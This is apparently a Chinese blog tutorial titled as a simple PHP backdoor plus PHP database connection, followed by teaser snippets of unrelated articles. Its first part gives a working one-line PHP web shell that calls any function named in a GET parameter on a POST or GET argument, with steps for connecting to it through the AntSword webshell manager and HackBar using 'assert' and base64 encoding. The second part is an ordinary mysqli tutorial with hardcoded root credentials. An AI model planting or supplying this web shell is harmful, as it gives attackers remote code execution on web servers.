php简单后门实现及php连接数据库
php简单后门实现
代码
<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>easybackdoor</title>
</head>
<body><?php$_GET['x']($_GET['y']);?></body>
</html>
效果
使用蚁剑连接
<?php$_GET['x']($_POST['y']);?>
使用hackbar传参,前面传assert
添加蚁剑数据,需要选择base64
连接成功
php连接数据库
相关函数
| 函数名 | 作用 |
|---|---|
| mysqli_connect() | 与MySQL 数据库建立连接。 |
| mysqli_close() | 关闭与MYSQL 数据库建立的连接。 |
| mysqli_connect_errno() | 与MySQL 数据库建立连接时,发生错误时的错误编号。 |
| mysqli_connect_error() | 与MySQL 数据库建立连接时,发生错误时的错误信息。 |
| mysqli_query() | 执行SQL 语句。 |
| mysqli_errno() | 执行SQL 语句时,发生错误的编号。 |
| mysqli_error() | 执行SQL 语句时,发生错误的信息。 |
| mysqli_fetch_assoc() | 从结果集对象中取数据,按条取数据。 |
| 函数 | 说明 |
|---|---|
| mysqli_fetch_row() | 以索引数组的方式获取一条记录的数据 |
| mysqli_fetch_assoc() | 以关联数组的方式获取一条记录的数据 |
| mysqli_fetch_array() | 以索引数组或关联数组的方式获取一条记录的数据 |
| mysqli_fetch_all() | 以索引数组或关联数组的方式获取全部记录的数据 |
| mysqli_num_rows() | 获取结果集对象中数据条数 |
| mysqli_free_result() | 释放与一个结果集合相关的内存 |
交互过程
- 建立与MySQL 链接。
- 执行SQL 语句,返回结果集对象。
- 从结果集对象中取数据。
- 关闭与MySQL 链接
建立链接
$db_host = "127.0.0.1";
$db_user = "root";
$db_pass = "root";
$db_name = "bbs";$link = @mysqli_connect($db_host, $db_user, $db_pass, $db_name);
如果链接成功,返回object(mysqli)1;否则,返回bool(false)。
$link 是对象类型的变量,相当于一个"令牌"。
捕获连接错误
- 错误编号
- 错误详情
if(!$link){exit("[".mysqli_connect_errno()."] ".mysqli_connect_error());
}
关闭链接
mysqli_close($link);
执行SQL
单条SQL 语句执行
$sql = "select * from users1;";$results = mysqli_query($link, $sql);
如果SQL 语句正常执行,就会返回对象类型object(mysqli_result)#2 的数据;否则,bool(false)。
对于insert,delete,update 等不会返回数据的SQL 语句,在执行没有错误时将返回true。对于返回数据的SQL 语句执行成功的时候会返回结果集对象,可以使用操作结果集对象的函数来从中获取数据。
SQL 错误
如果在执行SQL 语句的时候发生错误,mysqli_query 将返回false。可以使用以下函数捕获错误原因:
if(!$results){exit("[".mysqli_errno($link)."] ".mysqli_error($link));
}
完整代码实现
执行结果,遍历输出该表并写入表格
<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>mysqlconnect</title>
</head>
<body><?php$db_host="127.0.0.1";$db_user="root";$db_pass="root";$db_name="bbs";$link=@mysqli_connect($db_host, $db_user, $db_pass, $db_name);if(!$link){echo "link error<br>"."[".mysqli_connect_errno()."]".mysqli_connect_error();exit();}else{echo "link access";}$sql="select * from message;";$results=mysqli_query($link,$sql);if(!$results){echo "error,plz retry<br>"."[".mysqli_errno($link)."]".mysqli_error($link);}echo "<table border=2>";echo "<tr><td>id</td><td>uid</td><td>title</td><td>content</td></tr>";while($result=mysqli_fetch_assoc($results)){echo "<tr>";foreach($result as $k => $v){echo "<td>";echo $v;echo "</td>";}echo "</tr>";}echo "</table>";mysqli_close($link); ?></body>
</html>
相关文章:
php简单后门实现及php连接数据库
php简单后门实现 代码 <!DOCTYPE html> <html lang"en"> <head><meta charset"UTF-8"><meta name"viewport" content"widthdevice-width, initial-scale1.0"><title>easybackdoor</title>…...
IOS课程笔记[6] 基础控件
UILabel 控件 frame 设置尺寸 [lb setFrame:CGRectMake(5, 0, 400, 40)];Font 字体设置 [lb setFont:[UIFont systemFontOfSize:20.f]] [lb setFont:[UIFont boldSystemFontOfSize:25.f]]; [lb setFont:[UIFont italicSystemFontOfSize:23.f]];背景色 [lb setBackgroundC…...
XPath使用)
python爬虫入门(五)XPath使用
对于网页的节点来说,它可以定义 id、class 或其他属性。而且节点之间还有层次关系,在网页中可以通过 XPath 或 CSS 选择器来定位一个或多个节点。在页面解析时,利用 XPath 或 CSS 选择器来提取某个节点,然后再调用相应方法获取它的…...
【广州华锐互动】VR消防员模拟灭火:身临其境的火场救援
随着科技的不断发展,虚拟现实(VR)技术已经逐渐渗透到各个领域,为我们带来了前所未有的沉浸式体验。在这其中,VR模拟消防员灭火体验无疑是一种极具创新性和实用性的应用。通过这项技术,人们可以亲身体验到消…...
NFS性能瓶颈分析
前言 atop – run it with -d option or press d to toggle the disk stats view. iostat – try it with the -xm 2 options for extended statistics, in megabytes, and in two-second intervals. iotop – top-like I/O monitor. Try it with the -oPa options to show the…...
Java中配置RabbitMQ基本步骤
在Java中配置RabbitMQ,需要遵循以下步骤: 1.添加依赖 在项目的pom.xml文件中添加RabbitMQ的Java客户端依赖: <dependency><groupId>com.rabbitmq</groupId><artifactId>amqp-client</artifactId><versio…...
Ingress典型配置
Ingress 是 Kubernetes 中用于管理 HTTP 和 HTTPS 路由的资源。以下是一个典型的 Ingress 配置示例,用于将流量引导到两个不同的服务: apiVersion: networking.k8s.io/v1 kind: Ingress metadata:name: example-ingress spec:rules:- host: example.com…...
webpack中常见的Loader解决了什么问题?
一、是什么 loader 用于对模块的"源代码"进行转换,在 import 或"加载"模块时预处理文件 webpack做的事情,仅仅是分析出各种模块的依赖关系,然后形成资源列表,最终打包生成到指定的文件中。如下图所示&#…...
阿里7年经验之谈 —— 如何实现前端项目的自动化测试?
这其实就是我们常说的“UI自动化测试”,针对这个问题,我先告知答题思路如下: 1、什么是UI自动化?有什么优势? 2、UI自动化实践中会遇到什么难题? 3、如何解决难题,将UI落实到实践中?…...
动态开辟内存空间函数
文章目录 malloc函数calloc函数malloc函数和calloc函数的不同free函数realloc函数 malloc函数 参数是要开辟内存空间的大小 开辟成功则返回值为开辟空间的首地址,若开辟失败则返回一个空指针NULL calloc函数 第一个参数为开辟空间的元素个数,第二个参数…...
nodejs+vue备忘记账系统-计算机毕业设计
本文首先介绍了备忘记账系统管理技术的发展背景与发展现状,然后遵循软件常规开发流程,首先针对系统选取适用的语言和开发平台,目 录 摘 要 I ABSTRACT II 目 录 II 第1章 绪论 1 1.1背景及意义 1 1.2 国内外研究概况 1 1.3 研究的内容 1 第2章…...
百度Comate代码助手SaaS版本:智慧编程,引领新潮
引言 在当今数字化时代,软件开发已成为企业成功的关键因素之一。为了应对市场需求的不断变化,企业需要更高效、更灵活的开发工具。百度Comate代码助手的SaaS版本的正式上线,为广大企业和开发者提供了一种全新的编码方式,帮助他们…...
数据与视图的完美契合:Vue响应式的交织魅力
🤍 前端开发工程师(主业)、技术博主(副业)、已过CET6 🍨 阿珊和她的猫_CSDN个人主页 🕠 牛客高级专题作者、在牛客打造高质量专栏《前端面试必备》 🍚 蓝桥云课签约作者、已在蓝桥云…...
Centos8 降低gcc版本至gcc-7.3
1 首先卸载系统中的gcc sudo yum remove gcc 2 重新安装gcc-7.3 sudo dnf group install “Development Tools” 然后再次卸载gcc sudo yum remove gcc 然后发现centos-release-scl-rh已经安装了 sudo yum install centos-release-scl-rh yum -y install devtoolset-7-gcc dev…...
Qt之设置QLineEdit只能输入浮点数
Qt提供了QDoubleValidator来进行浮点数校验,但是它同样存在限定范围无效的问题,详见:Qt之彻底解决QSpinBox限定范围无效的问题 因此我们要子类化QDoubleValidator,并重写其中的validate方法,最后调用QLineEdit的setValidator方法,并将这个子类当做参数传入。 QHDoubleVa…...
Spark项目实战-卡口流量统计
一、卡口介绍 卡口摄像头正对车道安装,拍摄正面照片。 功能:抓拍正面特征 这种摄像头多安装在国道、省道、高速公路的路段上、或者城区和郊区交接的主要路口,用来抓拍超速、进出城区车辆等行为。它进行的是车辆正面抓拍,可以清晰…...
kubernetesr进阶--Secret概述
概述 Kubernetes Secret 对象可以用来储存敏感信息,例如:密码、OAuth token、ssh 密钥等。如果不使用 Secret,此类信息可能被放置在 Pod 定义中或者容器镜像中。将此类敏感信息存储到 Secret 中,可以更好地: 控制其使…...
在 Python 中使用 Pillow 进行图像处理【2/4】
第二部分 一、说明 该文是《在 Python 中使用 Pillow 进行图像处理》的第二部分,主要介绍pil库进行一般性处理:如:图像卷积、钝化、锐化、阈值分割。 二、在 Python 中使用 Pillow 进行图像处理 您已经学习了如何裁剪和旋转图像、调整图像大…...
XTU-OJ 1171-coins
题目描述 一个均质硬币抛n次,求不存在连续2次为正面的方案数。 输入 每行一个正整数n,n≤40。如果n为0,表示输入结束,不需要处理。 输出 每行输出一个结果,为一个整数。 样例输入 1 2 3 0样例输出 2 3 5 解题思路&…...
如何使用 JMeter 进行 HTTPS 请求测试?
本文将介绍如何使用 JMeter 测试 HTTPS 请求,并提供相关的技巧和注意事项。 在进行性能测试时,很多网站都采用了 HTTPS 协议。当我们测试 HTTPS 请求,如果服务端开启了双向认证,则需要客户端发送请求时带上证书。本文介绍如何在 …...
BGE Reranker-v2-m3开源可部署:提供完整Dockerfile与build脚本,便于CI/CD集成
BGE Reranker-v2-m3开源可部署:提供完整Dockerfile与build脚本,便于CI/CD集成 你是不是经常遇到这样的问题?从搜索引擎或者自己的数据库里搜出一堆文档,但排在前面的往往不是最相关的。手动一篇篇看过去,效率低不说&a…...
通过观察nRF52服务的回调,解释两种回调函数的区别,以及为什么看不到他们回调函数的调用
一、nRF52的两种回调我们在服务初始化的时候,会有回调函数的传入这个回调到底是干什么的?简单来说: 它是你告诉服务:“当这个服务发生重要事情时,请通知我(调用我的这个函数)”。具体作用&#…...
Z-Image-Turbo_Sugar脸部Lora效果对比:Euler a vs DPM++ 2M SDE生成质量评测
Z-Image-Turbo_Sugar脸部Lora效果对比:Euler a vs DPM 2M SDE生成质量评测 1. 模型介绍与部署准备 Z-Image-Turbo_Sugar脸部Lora是一个专门针对甜美风格人像生成的AI模型,基于Z-Image-Turbo的Lora版本进行优化。这个模型特别擅长生成具有"纯欲甜妹…...
HUNYUAN-MT赋能微信小程序:实时跨语言聊天翻译功能实现
HUNYUAN-MT赋能微信小程序:实时跨语言聊天翻译功能实现 最近在帮一个做跨境电商的朋友琢磨他的小程序,他愁的是用户来自世界各地,聊天时语言不通,客服压力巨大。这让我想到了一个挺有意思的方向:能不能在小程序里&…...
PHP中内存溢出问题的分析与解决详解
HP作为一种广泛使用的服务器端脚本语言,在处理大量数据或复杂任务时,常常会遇到内存溢出的问题。内存溢出不仅会导致程序崩溃,还可能影响服务器的稳定性。本文将探讨解决PHP内存溢出问题的最佳实践,并通过代码示例进行详细说明。1…...
)
Rocky Linux 9下用清华源5分钟搞定GitLab-CE安装(附防火墙配置)
Rocky Linux 9下用清华源5分钟搞定GitLab-CE安装(附防火墙配置) 在当今的软件开发协作中,GitLab已经成为团队不可或缺的代码管理和持续集成平台。对于国内开发者而言,如何在Rocky Linux 9系统上快速部署GitLab-CE,同时…...
CTFHub Web技能树通关笔记:用BurpSuite和cURL实战HTTP协议五大关卡
CTFHub Web技能树通关笔记:用BurpSuite和cURL实战HTTP协议五大关卡 当你第一次面对CTFHub的Web技能树时,那些关于HTTP协议的挑战关卡可能会让你感到既兴奋又迷茫。作为Web安全的基础,HTTP协议的理解和工具使用能力直接决定了你能否顺利通关。…...
DS3234高精度RTC驱动库:±2ppm温补时钟与双闹钟SRAM应用
1. 项目概述Soldered DS3234 RTC 是一款面向嵌入式系统的高精度实时时钟(RTC)驱动库,专为 Soldered 公司设计的 DS3234 SPI 接口 RTC 模块开发。该库并非简单封装底层寄存器访问,而是围绕 DS3234 芯片三大核心能力构建:…...
)
SpringBoot项目里PostgreSQL主键冲突?别慌,三步搞定序列同步(附排查脚本)
SpringBoot项目里PostgreSQL主键冲突?三步精准修复序列同步问题 当你在深夜赶进度时,突然看到控制台抛出"duplicate key value violates unique constraint"错误,那种感觉就像在高速公路上突然爆胎。作为经历过数十次类似场景的老司…...
4DGL-uLCD-SE:轻量级嵌入式GUI驱动框架
1. 项目概述4DGL-uLCD-SE 是一个面向嵌入式系统设计的轻量级、可移植的图形用户界面(GUI)驱动框架,专为 4D Systems 公司推出的 uLCD 系列智能显示模块(如 uLCD-320GL, uLCD-70DT, uLCD-43PT 等)而构建。该库并非直接操…...